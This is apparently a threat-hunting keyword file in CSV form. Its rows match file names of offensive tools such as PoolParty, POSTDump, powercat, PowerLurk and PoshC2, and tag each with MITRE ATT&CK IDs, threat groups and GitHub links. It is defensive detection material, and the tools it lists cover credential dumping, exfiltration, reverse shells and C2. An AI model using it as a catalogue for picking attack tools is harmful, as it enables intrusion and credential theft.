"*\PoolParty.hpp*",".{0,1000}\\PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17318"
"*\PoolParty.sln*",".{0,1000}\\PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17319"
"*\PoolParty.vcxproj*",".{0,1000}\\PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17320"
"*\PoolParty-PoolParty\*",".{0,1000}\\PoolParty\-PoolParty\\.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","17321"
"*\pop_exfil_client.py*",".{0,1000}\\pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","17322"
"*\pop_exfil_server.py*",".{0,1000}\\pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","17323"
"*\POP3-Clear-Text-Password-*.txt*",".{0,1000}\\POP3\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","17324"
"*\port_reuse.py*",".{0,1000}\\port_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","17325"
"*\port_scan.py*",".{0,1000}\\port_scan\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","17326"
"*\portbender.*",".{0,1000}\\portbender\..{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","17327"
"*\Portscan.exe*",".{0,1000}\\Portscan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17333"
"*\PortScan.exe*",".{0,1000}\\PortScan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17334"
"*\Port-Scan.ps1*",".{0,1000}\\Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17335"
"*\PortScanner.ahk*",".{0,1000}\\PortScanner\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","17336"
"*\port-scan-tcp.ps1*",".{0,1000}\\port\-scan\-tcp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","17337"
"*\port-scan-udp.ps1*",".{0,1000}\\port\-scan\-udp\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","17338"
"*\PoshADCS-master*",".{0,1000}\\PoshADCS\-master.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","17339"
"*\PoshC2*",".{0,1000}\\PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","17340"
"*\Poshito.dll*",".{0,1000}\\Poshito\.dll.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17341"
"*\Poshito.exe*",".{0,1000}\\Poshito\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17342"
"*\POSTDump.csproj*",".{0,1000}\\POSTDump\.csproj.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17343"
"*\PostDump.exe*",".{0,1000}\\PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17344"
"*\POSTDump.sln*",".{0,1000}\\POSTDump\.sln.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17345"
"*\POSTDump\POSTDump\*",".{0,1000}\\POSTDump\\POSTDump\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17346"
"*\PostExploitation.psm1*",".{0,1000}\\PostExploitation\.psm1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17347"
"*\POSTMiniDump\*",".{0,1000}\\POSTMiniDump\\.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","17348"
"*\Potato.exe*",".{0,1000}\\Potato\.exe.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","N/A","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","17349"
"*\Potato\obj\Release\Potato.pdb*",".{0,1000}\\Potato\\obj\\Release\\Potato\.pdb.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","17350"
"*\PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","17351"
"*\PotentiallyCrackableAccounts.ps1*",".{0,1000}\\PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17352"
"*\PowerBreach.ps1*",".{0,1000}\\PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17353"
"*\PowerBruteLogon*",".{0,1000}\\PowerBruteLogon.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","17354"
"*\powercat.ps1",".{0,1000}\\powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17355"
"*\powercat.ps1*",".{0,1000}\\powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","17356"
"*\Powercat.ps1*",".{0,1000}\\Powercat\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17357"
"*\powercat-master\*",".{0,1000}\\powercat\-master\\.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","17358"
"*\powerfun.ps1*",".{0,1000}\\powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","17359"
"*\powerglot\*",".{0,1000}\\powerglot\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","17360"
"*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17361"
"*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","17362"
"*\powerkatz_x64.dll*",".{0,1000}\\powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17363"
"*\powerkatz_x64.dll*",".{0,1000}\\powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17364"
"*\powerkatz_x86.dll*",".{0,1000}\\powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17365"
"*\powerkatz_x86.dll*",".{0,1000}\\powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17366"
"*\Powerless.cpp*",".{0,1000}\\Powerless\.cpp.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17367"
"*\Powerless.dll*",".{0,1000}\\Powerless\.dll.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17368"
"*\Powerless.exe*",".{0,1000}\\Powerless\.exe.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17369"
"*\PowerLessCLR.pdb*",".{0,1000}\\PowerLessCLR\.pdb.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17370"
"*\PowerLurk.ps1*",".{0,1000}\\PowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","17371"
"*\PowerLurk-main*",".{0,1000}\\PowerLurk\-main.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","17372"
"*\Powermad*",".{0,1000}\\Powermad.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","17373"
"*\Powermad.ps1*",".{0,1000}\\Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","17374"
"*\PowerPick.exe*",".{0,1000}\\PowerPick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17375"
"*\PowerPick\SharpPick\*",".{0,1000}\\PowerPick\\SharpPick\\.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17376"
"*\Powerpreter.psm1*",".{0,1000}\\Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17377"
"*\PowerProxy.ps1*",".{0,1000}\\PowerProxy\.ps1.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","17378"
"*\power-pwn\*",".{0,1000}\\power\-pwn\\.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","17379"
